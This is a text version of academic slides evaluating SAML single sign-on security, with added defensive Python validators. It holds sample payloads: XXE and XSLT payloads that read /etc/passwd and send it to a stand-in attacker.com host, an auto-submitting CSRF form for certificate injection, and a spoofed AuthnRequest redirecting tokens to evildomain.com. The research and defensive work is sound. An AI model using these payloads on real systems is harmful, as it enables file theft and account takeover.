Practical Security Evaluation of SAML-based Single Sign-On Solutions

Vladislav Mladenov, Andreas Mayer, Marcus Niemietz, Christian Mainka, Florian Feldmann, Julian Krautwald, Jörg Schwenk

Agenda
- Single Sign-On
- Attacks on SPs
- Attacks on IdPs
- Future Work

Single Sign-On
[Diagram: a user logging in with username/password]

Single Sign-On
[Diagram: the user authenticates once with username/password at the Identity Provider and receives a token; the same token is presented to Service Providers 1 to 5]

Single Sign-On
[Sequence diagram, Identity Provider / Client / Service Provider: GET Resources, Token Request, Token Request, Authentication, Token, Token, Resources; both the Client-SP and the Client-IdP legs run over TLS]

Login Architecture
[Diagram: Username/Password enters the Service Provider at the WEB Frontend, followed by Session Management, the Authorization & Access Module and the Resources; a Single Sign-On module and a Database sit alongside]

Login Architecture
[Diagram: as above, with the Single Sign-On module split into Parser, Verifier and Processor]

Next section: Attacks on SPs

Attacks on SPs
[Sequence diagram, Identity Provider / Client / Service Provider, both legs over TLS]
1. GET Resources (Client to SP)
2. Token Request (SP to Client)
3. Token Request (Client to IdP)
4. Authentication
5. Token (IdP to Client)
6. Token (Client to SP)
7. Resources (SP to Client)

Goals
Unauthorized access to restricted resources on the SP
Security-relevant parameters in the token:
- Timestamps/Nonces
- Information about the authenticated subject
- Information about the recipient of the token
- Information about the issuer of the token
- Signature/HMAC keys

Replay Attacks
Requirements: The attacker has a valid token
How it works: The attacker reuses the token indefinitely
Success if: An expired token is accepted
[Diagram: saml:Response containing a saml:Assertion (ID=111) with saml:Subject "Bob", saml:Conditions (timestamps, recipient) and a saml:Signature (ds:Key) whose Reference points to ID 111]

Replay Attacks
[Login architecture diagram as on the Login Architecture slide]

Signature Exclusion
Requirements: No requirements
How it works: The attacker creates a token
Success if: An unsigned token is accepted
[Diagram: token structure as on the Replay Attacks slide; the saml:Signature is the element the attacker leaves out]

Signature Exclusion
[Login architecture diagram as on the Login Architecture slide]

Certificate Faking
Requirements: No requirements
How it works: The attacker creates a token and signs it with his private key
Success if: A token signed with an untrusted key is accepted
[Diagram: token structure as on the Replay Attacks slide; the saml:Signature carries the attacker's ds:Key]

Certificate Faking
[Login architecture diagram as on the Login Architecture slide]

Token Recipient Confusion
Requirements: The attacker has a valid token for ServiceA; ServiceA and ServiceB trust the same IdP
How it works: The attacker sends the token to ServiceB
Success if: ServiceB accepts the token generated for ServiceA
[Diagram: saml:Response containing a saml:Assertion (ID=111) with saml:Subject "Bob", saml:Conditions (timestamps, Recipient=SA) and a saml:Signature (ds:Key) whose Reference points to ID 111]

Token Recipient Confusion
[Login architecture diagram as on the Login Architecture slide]

XML Signature Wrapping
Requirements: The attacker has a valid token
How it works: The attacker injects malicious content into the token without invalidating the signature
Success if: The token is successfully verified and the malicious content is processed
[Diagram: saml:Response holding two saml:Assertion elements, one with saml:Subject "Bob" and one with saml:Subject "Admin" (IDs 111 and 666); the saml:Signature with ds:Key references ID 111]

XML Signature Wrapping
[Login architecture diagram as on the Login Architecture slide]
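The five SP-side attacks above (Replay, Signature Exclusion, Certificate Faking, Token Recipient Confusion and XML Signature Wrapping) each exploit one missing check in the Verifier. The following added example (not code from the slides or their authors) shows those checks as one structural validator over a constructed SAML Response; the SP URL, the certificate placeholder and the sample token are assumptions, and cryptographic verification of the SignatureValue is assumed to be done by an XML-DSig library.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone
NS = {"samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
      "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
      "ds": "http://www.w3.org/2000/09/xmldsig#"}
SP_URL = "https://sp.example/acs"
# Constructed sample token (not from the slides): one signed assertion for SP_URL.
SAMPLE = f"""<samlp:Response xmlns:samlp="{NS['samlp']}" xmlns:saml="{NS['saml']}" xmlns:ds="{NS['ds']}">
<saml:Assertion ID="_111"><saml:Subject><saml:NameID>Bob</saml:NameID><saml:SubjectConfirmation>
<saml:SubjectConfirmationData Recipient="{SP_URL}"/></saml:SubjectConfirmation></saml:Subject>
<saml:Conditions NotBefore="2016-03-17T09:00:00Z" NotOnOrAfter="2016-03-17T09:05:00Z">
<saml:AudienceRestriction><saml:Audience>{SP_URL}</saml:Audience></saml:AudienceRestriction></saml:Conditions>
<ds:Signature><ds:SignedInfo><ds:Reference URI="#_111"/></ds:SignedInfo><ds:KeyInfo><ds:X509Data>
<ds:X509Certificate>IDP-CERT-PLACEHOLDER</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature>
</saml:Assertion></samlp:Response>"""

def saml_time(s):  # SAML timestamps are UTC ISO 8601
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def check_assertion(xml_text, sp_url, trusted_certs, now, seen_ids):
    """Structural checks before a token is trusted; "ok" or "reject: <why>". SignatureValue bytes: XML-DSig library."""
    root = ET.fromstring(xml_text)
    # Signature wrapping: unique IDs and exactly one Assertion, so Verifier and Processor see the same element.
    ids = [e.get("ID") for e in root.iter() if e.get("ID") is not None]
    assertions = root.findall("saml:Assertion", NS)
    if len(ids) != len(set(ids)) or len(assertions) != 1:
        return "reject: duplicate IDs or not exactly one Assertion"
    a, aid = assertions[0], assertions[0].get("ID", "")
    # Signature exclusion: unsigned, or signed with a Reference to another element, is refused.
    sig = a.find("ds:Signature", NS)
    ref = sig.find("ds:SignedInfo/ds:Reference", NS) if sig is not None else None
    if ref is None or ref.get("URI") != "#" + aid:
        return "reject: assertion unsigned or signature covers another element"
    # Certificate faking: only the pinned IdP certificate may sign.
    cert = sig.findtext("ds:KeyInfo/ds:X509Data/ds:X509Certificate", "", NS).strip()
    if cert not in trusted_certs:
        return "reject: signer certificate not trusted"
    # Replay: 'now' must fall inside the validity window and the assertion ID must be unused.
    cond = a.find("saml:Conditions", NS)
    nb, na = (cond.get("NotBefore"), cond.get("NotOnOrAfter")) if cond is not None else (None, None)
    if not nb or not na or not (saml_time(nb) <= now < saml_time(na)) or aid in seen_ids:
        return "reject: expired, not yet valid, or already consumed"
    # Recipient confusion: Recipient and Audience must both name this SP (exact match).
    scd = a.find("saml:Subject/saml:SubjectConfirmation/saml:SubjectConfirmationData", NS)
    aud = cond.findtext("saml:AudienceRestriction/saml:Audience", "", NS).strip()
    if scd is None or scd.get("Recipient") != sp_url or aud != sp_url:
        return "reject: token addressed to another service provider"
    seen_ids.add(aid)
    return "ok"
```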

XE: XML Entity
[Example: an XHTML 1.0 Transitional document with title "xe" whose body shows the text "2 < 3" twice; in XML source a less-than sign inside text must be written with an entity]

XE: XML Entity (internal entity)
Client sends:
  <!DOCTYPE foo [ <!ENTITY name "Bob" > ]>
  <Envelope><Body><order><name>&name;</name></order></Body></Envelope>
Server answers:
  <Envelope><Body>Thank you Bob</Body></Envelope>

XXE: XML External Entity Attacks
Client sends:
  <!DOCTYPE order [<!ENTITY name SYSTEM "c:\boot.ini">]>
  <Envelope><Body><order><name>&name;</name><product>computer</product></order></Body></Envelope>
Server answers:
  <Envelope><Body>Thank you [ contents of c:\boot.ini ]</Body></Envelope>
[Diagram: parsed tree Envelope > Body > order > name, where name holds the contents of C:\boot.ini]

XML External Entity (XXE)
Requirements: No requirements
How it works: The attacker sends malicious XML content to the SP
Success if: The attacker can access resources stored on the filesystem of the SP
  <?xml version="1.0" encoding="utf-8"?>
  <!DOCTYPE Response [
    <!ENTITY file SYSTEM "/etc/passwd">
    <!ENTITY send SYSTEM "http://attacker.com/?read=&file;">
  ]>
  <samlp:Response>
    <attack>&send;</attack>
  </samlp:Response>

XML External Entity (XXE)
[Login architecture diagram as on the Login Architecture slide]

XSLT
Requirements: No requirements
How it works: The attacker sends malicious XML content to the SP
Success if: The attacker can access resources stored on the filesystem of the SP
[Diagram: saml:Response > saml:Assertion > ds:Signature > ds:Transform carrying the XSLT payload]
XSLT payload:
  <xsl:stylesheet xmlns:xsl="...">
    <xsl:template match="doc">
      <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
      <xsl:variable name="escaped" select="encode-for-uri($file)"/>
      <xsl:variable name="attackerurl" select="'http://attacker.com/'"/>
      <xsl:variable name="exploiturl" select="concat($attackerurl,$escaped)"/>
      <xsl:value-of select="unparsed-text($exploiturl)"/>
    </xsl:template>
  </xsl:stylesheet>

XSLT
[Login architecture diagram as on the Login Architecture slide]
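Both the XXE and the XSLT attack enter through the Parser and the signature Transform step, so the defence is to refuse DTDs, entity declarations and non-whitelisted transform algorithms before anything else is processed. The following added example (not code from the slides or their authors) does this with Python's expat parser; the sample messages and the file placeholder are constructed for illustration.

```python
import xml.parsers.expat
# Transform algorithms an SP should accept inside ds:Signature; XSLT is not among them.
ALLOWED_TRANSFORMS = {
    "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
    "http://www.w3.org/2001/10/xml-exc-c14n#",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
}

class UnsafeXml(Exception):
    pass

def parse_hardened(xml_text):
    """Parse a SAML message with expat, refusing any DTD, any entity declaration and any
    ds:Transform outside the whitelist. Returns the (element name, attributes) pairs seen."""
    parser = xml.parsers.expat.ParserCreate()
    seen = []

    def refuse(*_args):  # fires on <!DOCTYPE ...> and on every <!ENTITY ...> declaration
        raise UnsafeXml("DTD and entity declarations are not allowed in SAML messages")

    def start(name, attrs):
        if name.split(":")[-1] == "Transform" and attrs.get("Algorithm") not in ALLOWED_TRANSFORMS:
            raise UnsafeXml("transform algorithm not allowed: %s" % attrs.get("Algorithm"))
        seen.append((name, attrs))

    parser.StartDoctypeDeclHandler = refuse
    parser.EntityDeclHandler = refuse
    parser.StartElementHandler = start
    parser.Parse(xml_text, True)  # an undefined &entity; reference raises ExpatError here
    return seen

def check_message(xml_text):
    """Returns "ok" or "reject: <reason>" for a received SAML message."""
    try:
        parse_hardened(xml_text)
        return "ok"
    except (UnsafeXml, xml.parsers.expat.ExpatError) as e:
        return "reject: %s" % e

# Constructed samples (not from the slides).
CLEAN = ('<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
         'xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:Signature><ds:SignedInfo>'
         '<ds:Reference URI="#a1"><ds:Transforms><ds:Transform '
         'Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/></ds:Transforms>'
         '</ds:Reference></ds:SignedInfo></ds:Signature></samlp:Response>')
XXE = ('<!DOCTYPE Response [<!ENTITY file SYSTEM "file:///PLACEHOLDER-PATH">]>'
       '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">&file;</samlp:Response>')
XSLT = CLEAN.replace("http://www.w3.org/2000/09/xmldsig#enveloped-signature",
                     "http://www.w3.org/TR/1999/REC-xslt-19991116")
```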

Certificate Injection: Cross-Site Request Forgery (CSRF)
Legitimate request: https://bank.com/payments/?name=rub&iban=1111&payment=20
Host: bank.com
Path: https://bank.com/payments
Parameters: name=rub, iban=1111, payment=20

Certificate Injection: Cross-Site Request Forgery (CSRF)
Forged request: https://bank.com/payments/?name=evil&iban=666&payment=200
Host: bank.com
Path: https://bank.com/payments
Parameters: name=evil, iban=666, payment=200

Certificate Injection
Requirements: No requirements
How it works: The attacker sends a valid token signed with his private key
Success if: The token is successfully verified

Certificate Injection
[Login architecture diagram as on the Login Architecture slide]

Certificate Injection
  <html>
  <head></head>
  <body onload="document.forms[0].submit()">
  <form method="post" enctype="multipart/form-data" action="https://sp_url.com">
    <input type="text" name="mode" value="samlupdate" />
    <input type="text" name="samlfname" value="" />
    <input type="text" name="bizcpn" value="INSERT XSRF TOKEN! (not validated)" />
    <input type="text" name="samlloginurl" value="INSERT SAML LOGIN URL!" />
    <input type="text" name="samllogouturl" value="INSERT SAML LOGOUT URL!" />
    <input type="text" name="chpasswdurl" value="INSERT PASSWORD CHANGE URL!" />
    <input type="file" name="samlupload" value="" />
    <input type="text" name="publickey" value="INSERT ENCODED CERTIFICATE!" />
    <input type="text" name="algorithm" value="rsa" />
  </form></body></html>

Next section: Attacks on IdPs

Attacks on IdPs
[Sequence diagram, Identity Provider / Client / Service Provider: GET Resources, Token Request, Token Request, Authentication, Token, Token, Resources; both legs over TLS]

Attacks on IdPs
[Diagram: the user authenticates to the Identity Provider with username/password and receives tokens]

ACS Spoofing
[Sequence diagram, Identity Provider / Client / Attacker / Service Provider, all legs over TLS: GET Resources, Token Request, GET Resources, Token Request, Token Request, Authentication, Token, Token, Token, Resources]

ACS Spoofing
Request URL: http://www.onelogin.com?samlrequest= followed by the encoded AuthnRequest (blob omitted)
Decoded request:
  <samlp:AuthnRequest ID="agdobjcfikneommfjamdclenj" Version="2.0" IssueInstant="2013-04-17T9:30:00Z"
      AssertionConsumerServiceURL="https://www.evildomain.com/">
    <saml:Issuer> http://google.com </saml:Issuer>
  </samlp:AuthnRequest>
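The IdP-side fix for ACS Spoofing is to never trust the AssertionConsumerServiceURL in the request on its own: it must match, exactly, an ACS URL registered for that Issuer in the IdP's metadata. The following added example (not code from the slides or their authors) decodes a SAMLRequest as carried in the HTTP-Redirect binding shown above and applies that check; the SP registry, the sample request and the URLs are constructed assumptions.

```python
import base64
import xml.etree.ElementTree as ET
import zlib
from urllib.parse import parse_qs, quote, urlsplit
NS = {"samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
      "saml": "urn:oasis:names:tc:SAML:2.0:assertion"}
AUTHN_REQUEST = "{%s}AuthnRequest" % NS["samlp"]

# Constructed SP registry standing in for the IdP's metadata store: Issuer -> registered ACS URLs.
REGISTERED_SPS = {"https://sp.example/metadata": {"https://sp.example/acs"}}

# Constructed AuthnRequest (not from the slides); Issuer and ACS URL match the registry.
SAMPLE_REQUEST = (
    '<samlp:AuthnRequest xmlns:samlp="%s" xmlns:saml="%s" ID="_r1" Version="2.0" '
    'IssueInstant="2016-03-17T09:30:00Z" AssertionConsumerServiceURL="https://sp.example/acs">'
    '<saml:Issuer>https://sp.example/metadata</saml:Issuer></samlp:AuthnRequest>'
) % (NS["samlp"], NS["saml"])

def encode_redirect_request(xml_text):
    """HTTP-Redirect binding: raw DEFLATE, then base64, then URL-encode."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15: raw deflate, no zlib header
    raw = c.compress(xml_text.encode("utf-8")) + c.flush()
    return quote(base64.b64encode(raw).decode("ascii"), safe="")

def decode_redirect_request(url):
    """Inverse of the above for the SAMLRequest query parameter of an IdP SSO URL."""
    value = parse_qs(urlsplit(url).query)["SAMLRequest"][0]
    return zlib.decompress(base64.b64decode(value), -15).decode("utf-8")

def resolve_acs(url):
    """Decide where the IdP may send the token: ("ok", acs_url) or ("reject", reason).
    The ACS URL is compared by exact string match; prefix or substring matching would defeat the check."""
    try:
        req = ET.fromstring(decode_redirect_request(url))
    except (KeyError, ValueError, zlib.error, ET.ParseError) as e:
        return ("reject", "undecodable SAMLRequest: %s" % e)
    if req.tag != AUTHN_REQUEST:
        return ("reject", "not an AuthnRequest")
    issuer = req.findtext("saml:Issuer", "", NS).strip()
    registered = REGISTERED_SPS.get(issuer)
    if registered is None:
        return ("reject", "unknown Issuer %r" % issuer)
    requested = req.get("AssertionConsumerServiceURL")
    if requested is None:  # no override requested: fall back to the metadata entry
        return ("ok", sorted(registered)[0])
    if requested not in registered:
        return ("reject", "AssertionConsumerServiceURL not registered for %s" % issuer)
    return ("ok", requested)
```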

XSS/CSRF/Clickjacking
[Diagram, Identity Provider / Client over TLS: Authentication, Session Cookie, Token, Token]

XSS/CSRF/Clickjacking
[Diagram, Identity Provider / Client / Attacker: Authentication, Session Cookie, Session Cookie, Token, Session Cookie, Token; the attacker obtains the Client's session cookie at the IdP and with it tokens]

Next section: Future Work

Penetration Tests
- New methods for penetration tests of SSO systems are needed
- New tools should be developed: SAML attacker, OpenID attacker, ACSScanner
- TLS channel bindings: Holder-of-Key, TLS-Unique, SLSOP

Questions!?